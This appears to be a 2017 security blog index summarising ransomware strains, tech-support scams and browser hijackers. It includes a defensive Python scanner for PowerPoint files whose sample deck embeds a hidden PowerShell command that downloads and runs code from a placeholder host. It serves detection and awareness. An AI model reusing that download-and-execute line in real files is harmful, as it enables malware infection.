WhyCry Ransomware

PC security researchers first observed the WhyCry Ransomware on June 13, 2017. The WhyCry Ransomware was observed in the wild, distributed through documents that use malicious macros to download and install the WhyCry Ransomware onto the victim's computer. These documents are delivered by spam email messages that use social engineering to trick computer users into opening the attachment, which then downloads and installs the WhyCry Ransomware. The WhyCry Ransomware is a low-level ransomware variant that is clearly the work of amateurs, probably assembled by copying and pasting portions of code from other sources rather than through a real development process. It is likely that the WhyCry Ransomware was largely derived from the Haters Ransomware and its variants, first observed in May 2017.

There's a Lot of...

Posted on June 14, 2017 in Ransomware

CA$HOUT Ransomware

The CA$HOUT Ransomware is an encryption ransomware Trojan. It first caught the attention of PC security researchers because, according to some of them, its code is simply a complete mess: the CA$HOUT Ransomware seems to have been created by pasting together bits of code from various other ransomware Trojans. The CA$HOUT Ransomware was first observed on June 13, 2017, and it is clearly the work of amateurs rather than of a well-funded developer. However, the CA$HOUT Ransomware does carry out an effective encryption ransomware attack.

The CA$HOUT Ransomware may not Find Too Many Files to be Encrypted

The most common way of delivering the CA$HOUT Ransomware to its victims is through corrupted documents attached to spam email messages. These use malicious scripts and macros to download and...

Posted on June 13, 2017 in Ransomware

StrutterGear Ransomware

The StrutterGear Ransomware is a ransomware Trojan that seems to be a variant of the Jigsaw Ransomware, a family of ransomware that has been active for quite a while and whose theme borrows from the Saw movies and their iconic Jigsaw character. The StrutterGear Ransomware was first observed in June 2017 on online anti-virus scanning platforms, which con artists may use to test their ransomware variants and see whether they evade detection by established anti-virus products. There are several variants of the StrutterGear Ransomware, all released in 2017 and targeting computers running the Windows operating system. The StrutterGear Ransomware may be released publicly, but for now, it exists in a test version that seems to be incomplete.

The StrutterGear Ransomware Belongs to the Jigsaw Family of Ransomware Trojans

The...

Posted on June 13, 2017 in Ransomware

Ogre Ransomware

The Ogre Ransomware is an encryption ransomware Trojan that was first observed by malware researchers on an online anti-malware scanner (it is common to find these threats uploaded to such services as part of their creators' testing, to find out whether they bypass commonly used anti-virus programs). When PC security researchers observed the Ogre Ransomware, it was clear that it was still in a testing phase. However, it is likely that a full version of the Ogre Ransomware will eventually be released publicly. The Ogre Ransomware seems to be designed to mimic the behavior of the Petya Ransomware, another well-known threat.

The Ape Ogre

The Ogre Ransomware receives its name because it marks the files it encrypts with the file extension '.ogre,' which is appended to each encrypted file's name. The Ogre Ransomware will...

Posted on June 13, 2017 in Ransomware

‘Firewall Breach Detected’ Pop-Ups

The 'Firewall Breach Detected' messages in your browser are not to be trusted. Alerts displayed on a Web page claiming that your firewall was breached are fake security alerts; a Web page has no way of inspecting the firewall on your computer, which by itself is a reliable sign that any such in-browser alert is fraudulent. The 'Firewall Breach Detected' pop-ups are generated on deceptive sites, which include a screen capture of Support.microsoft.com and aim to convince the user to call a toll-free phone line such as 844-699-8351. Legitimate computer support agents do not operate the 844-699-8351 phone line, nor the other lines advertised on the same 'Firewall Breach Detected' notifications. The screen capture of Support.microsoft.com is a modified image that is used to claim credibility and fool users into thinking that the security alert on their screens comes directly from Microsoft Corp. The 'Firewall Breach Detected' warnings provide misleading...

Posted on June 13, 2017 in Adware

Malicious PowerPoint Spam Attachment Infects PCs Without Mouse Click

Oddly enough, computer hackers sometimes don't get the credit they deserve for the crafty methods they devise for infecting PCs around the world. As it turns out, credit is due to a group of hackers who initiated an aggressive spam campaign spreading malware that does not require a mouse click to infect your PC. The recent spam email campaign carries messages whose attached PowerPoint file only requires you to hover the mouse pointer over a hyperlinked piece of text: the link's mouseover action launches a malicious PowerShell command that loads the malware. This could very well be the beginning of a new method of spreading malware. As alarming as it sounds, spreading malware through a PowerShell script triggered this way has not yet been widely used by hackers, and Office displays a security notice before running the external program, so the infection still depends on the user approving it. In fact, the spread of the campaign has slowed down drastically, but it remains a threat to some. According to computer...

Posted on June 12, 2017 in Computer Security
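The hover technique described above works because a PowerPoint deck (.pptx/.ppsx) is a ZIP archive of XML parts: a slide's text run can carry an a:hlinkMouseOver (or a:hlinkClick) element whose action attribute is ppaction://program, and the relationship it references holds the command line PowerPoint runs when the action fires. The scanner below is an added example written for this page, not code from the campaign or from the original article. It builds a minimal deck in memory (the slide, the relationship, the PowerShell command line and the URL example.invalid in it are constructed placeholders, not indicators from the real campaign) and reports every run-program hyperlink action it finds, which is the check an analyst or a mail gateway would run over a suspicious attachment.

```python
"""Scan a .pptx/.ppsx for hyperlink actions that launch an external program.

Added example (not from the original article). The sample deck is
constructed inline so the scanner runs offline; the command line and the
URL inside it are placeholders, not real indicators of compromise.
"""
import io
import re
import zipfile
import posixpath
import xml.etree.ElementTree as ET
from urllib.parse import unquote

R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Hyperlink trigger elements in DrawingML and the action value meaning "run a program".
TRIGGERS = {"hlinkMouseOver", "hlinkClick"}
PROGRAM_ACTION = "ppaction://program"


def _local(tag):
    """Strip the XML namespace from an ElementTree tag."""
    return tag.rsplit("}", 1)[-1]


def _load_rels(zf, slide_name):
    """Map relationship Id -> Target for one slide part (empty if the part has no rels)."""
    rels_name = posixpath.join(
        posixpath.dirname(slide_name), "_rels", posixpath.basename(slide_name) + ".rels")
    if rels_name not in zf.namelist():
        return {}
    root = ET.fromstring(zf.read(rels_name))
    # Targets may be percent-encoded; decode so the command line reads as typed.
    return {rel.get("Id"): unquote(rel.get("Target", ""))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship")}


def find_program_actions(pptx_bytes):
    """Return [(slide part, trigger element, resolved command)] for every run-program action."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as zf:
        slides = sorted(n for n in zf.namelist()
                        if re.fullmatch(r"ppt/slides/slide\d+\.xml", n))
        for slide in slides:
            rels = _load_rels(zf, slide)
            for el in ET.fromstring(zf.read(slide)).iter():
                if _local(el.tag) not in TRIGGERS:
                    continue
                if not el.get("action", "").startswith(PROGRAM_ACTION):
                    continue
                target = rels.get(el.get(f"{{{R_NS}}}id"), "<unresolved>")
                findings.append((slide, _local(el.tag), target))
    return findings


def build_sample_deck():
    """Constructed minimal deck: one slide whose text run fires a command on hover."""
    slide_xml = (
        '<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" '
        'xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" '
        f'xmlns:r="{R_NS}"><p:cSld><p:spTree><p:sp><p:txBody><a:p><a:r>'
        '<a:rPr lang="en-US"><a:hlinkMouseOver r:id="rId2" action="ppaction://program"/>'
        '</a:rPr><a:t>Loading... please wait</a:t></a:r></a:p></p:txBody></p:sp>'
        '</p:spTree></p:cSld></p:sld>')
    rels_xml = (
        f'<Relationships xmlns="{PKG_NS}">'
        f'<Relationship Id="rId2" Type="{R_NS}/hyperlink" '
        # Placeholder command line (constructed); example.invalid never resolves.
        'Target="powershell -NoP -NonI -W Hidden -Exec Bypass '
        '&quot;IEX (New-Object Net.WebClient).DownloadString(&apos;http://example.invalid/c.php&apos;)&quot;" '
        'TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ppt/slides/slide1.xml", slide_xml)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for slide, trigger, cmd in find_program_actions(build_sample_deck()):
        print(f"{slide}: {trigger} -> {cmd}")
```

To scan a real attachment, read the file's bytes and pass them to find_program_actions(); a legitimate deck almost never needs ppaction://program, so any hit is worth quarantining regardless of which program the target names.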

‘Windows Defender Alert: Zeus Virus’ Tech Support Scam

When computer security experts discuss the 'Windows Defender Alert: Zeus Virus' Tech Support Scam, they refer to fake computer support agents whose "services" are advertised on unreliable sites. The campaign associated with the 'Windows Defender Alert: Zeus Virus' Tech Support Scam is based on recently registered sites with random, gibberish-looking names that claim a virus has been detected on the system. The 'Windows Defender Alert: Zeus Virus' messages are reported to be hosted on sites registered to the 107.180.55.9 IP address. Numerous domains are being used to deliver the 'Windows Defender Alert: Zeus Virus' pop-ups to users across the globe; some of them include: ransomewaredetected[.]xyz, malwarethreatdetect[.]xyz, rasagulsdasdeaa[.]xyz, palkovasdareadas[.]xyz, othavirusda[.]xyz, omalavirusdadsad[.]xyz...

Posted on June 12, 2017 in Adware

Video Ads Blocker

The Video Ads Blocker software by youtubeadblock.net is promoted as a browser extension that can block native ads on YouTube. As its name suggests, the Video Ads Blocker is supposed to let Web surfers watch video content without having to sit through five-second ads and click the 'Skip' button. Those ads may seem annoying, and you may be tempted to install the Video Ads Blocker on your computer. What you should consider is that YouTube is an ad-supported platform (like Vimeo, Metacafe and Dailymotion): content creators make money by having their videos monetized through the advertisements displayed. Additionally, the Video Ads Blocker software may block ads on Youtube.com, but it is designed to connect to ad portals and click on advertisements in the background, a form of click fraud that runs on your computer and your bandwidth. The Video Ads Blocker by youtubeadblock.net is classified as...

Posted on June 12, 2017 in Possibly Unwanted Program

Loadstart.biz

The Loadstart.biz site is presented to users as a search service and new tab replacement. Loadstart.biz has no rank on Alexa.com, and Hyperstat.com has no information on the site. Loadstart.biz was registered on May 26, 2017 and was soon reported in connection with cases of browser hijacking. Loadstart.biz is associated with the 50.7.122.18 and 198.105.208.113 IP addresses. PC users may install the Loadstart.biz browser hijacker as a component of a free program bundle deployed via the Installmachine.com platform. Network analysis revealed that the Loadstart.biz site acts as a redirect gateway to Google.com and does not work as a legitimate search service. Also, users may experience pop-up windows that load content from h[tt]p://get1.installmachine.com/data/?track_id=[RANDOM CHARACTERS] and offer access to free...

Posted on June 12, 2017 in Browser Hijackers

‘RDN_YahLover.worm’ Pop-ups

The 'RDN_YahLover.worm' pop-up windows are part of the "RDN_YahLover.worm Infection Scam" that was observed for the first time back in May. PC users reported notifications in their browsers saying they were infected with a computer worm named RDN_YahLover.worm. Cyber security experts do use the detection name 'RDN_YahLover.worm' for a real threat; however, the 'RDN_YahLover.worm' security alerts in the browser should not be trusted. The "RDN_YahLover.worm Infection Scam" is the work of con artists who borrowed the name of a real threat and created a persistent dialog box shown to users on sites like web-alrt-phsng-atck[.]xyz, warningalert[.]xyz and many others. The pages used to generate the 'RDN_YahLover.worm' notifications include a script designed to lock up or crash the user's browser and cause distress. The...

Posted on June 12, 2017 in Adware

‘.sVn File Extension’ Ransomware

The '.sVn File Extension' Ransomware is a variant of the Jaff Ransomware, which also goes by the name of Jeff Decryptor Ransomware. This variant was released a few weeks after its predecessor. The '.sVn File Extension' Ransomware uses a typical delivery method: it may be sent to victims in the form of macro-enabled Microsoft Office documents which, once the user enables the macros (the attack relies on that user action rather than on a software vulnerability), run scripts on the victim's computer that download and install the '.sVn File Extension' Ransomware. These attachments arrive in spam email campaigns whose messages pretend to come from legitimate companies such as social media platforms or online retailers. It is essential to learn to spot these hoaxes and avoid opening any unsolicited email...

Posted on June 12, 2017 in Ransomware

xXLecXx Ransomware

The xXLecXx Ransomware is a lock screen ransomware Trojan. What this means is that the xXLecXx Ransomware is designed to take the victim's computer hostage by displaying a lock screen, a full-screen message that prevents the victim from using the affected computer. Lock screen Trojans were an especially popular threat variant several years ago, with various tactics associated with them. For example, one variety of lock screen ransomware Trojan would impersonate law enforcement, tricking the victim into thinking that the police had locked the computer, in an attempt to extract a 'fine.' These ransomware Trojans have largely been replaced by encryption ransomware Trojans, which instead take the victim's data hostage by encrypting it with a strong encryption algorithm. This is a more effective attack because, even if the...

Posted on June 12, 2017 in Ransomware

CryptoGod Ransomware

The CryptoGod Ransomware is an encryption ransomware Trojan that is part of a ransomware family that has been active at least since May 2017. The threats in the CryptoGod Ransomware family carry out a typical ransomware attack, consisting of encrypting the computer user's files using a strong encryption algorithm and then demanding the payment of a ransom from the victim. There are multiple versions of the CryptoGod Ransomware and its variants. The most common way in which the CryptoGod Ransomware is distributed is as a spam email attachment that uses malicious macros to deliver its payload to the victim. PC security analysts advise computer users to take steps to protect their data from threats like the CryptoGod Ransomware.

All this God Wants is Your Money

The CryptoGod Ransomware poses a real threat to computer...

Posted on June 12, 2017 in Ransomware

Spectre Ransomware

PC security researchers have been tracking the Spectre Ransomware for some time. This ransomware Trojan was observed in testing mode around June 9 and was released in a full version a few days later. It seems that the Spectre Ransomware is a sophisticated ransomware Trojan and that considerable time and resources have been expended in creating it. Because of this, PC security researchers consider it possible that the Spectre Ransomware and its variants may become an important threat to computer users.

The Specter of a Spectre Haunting Your Files

The Spectre Ransomware carries out a typical encryption ransomware Trojan attack, which involves encrypting the victims' files and then requesting a ransom. The Spectre Ransomware was first observed in a testing mode, where it connected to its Command and Control server to...

Posted on June 12, 2017 in Ransomware

Xlsearch.net

The Xlsearch.net site is offered to Web surfers as a search service, but it was mentioned in cases of browser hijacking in the second week of June 2017. The Xlsearch.net site is registered to the 54.214.50.188 IP address and appears to be connected to several gateways that we have added to our database of browser hijackers. The Xlsearch.net browser hijacker evidently behaves a lot like those associated with Usearch.co.id and Searchiincognito.com, which are registered to the same IP address. The Xlsearch.net browser hijacker is aimed primarily at users in Indonesia, but users in other countries may be infected as well. The browser hijacker responsible for redirects to Xlsearch.net may be spread among PC users by means of software bundling, which is a common strategy in the cyber world. Web surfers that are infected with the Xlsearch.net...

Posted on June 9, 2017 in Browser Hijackers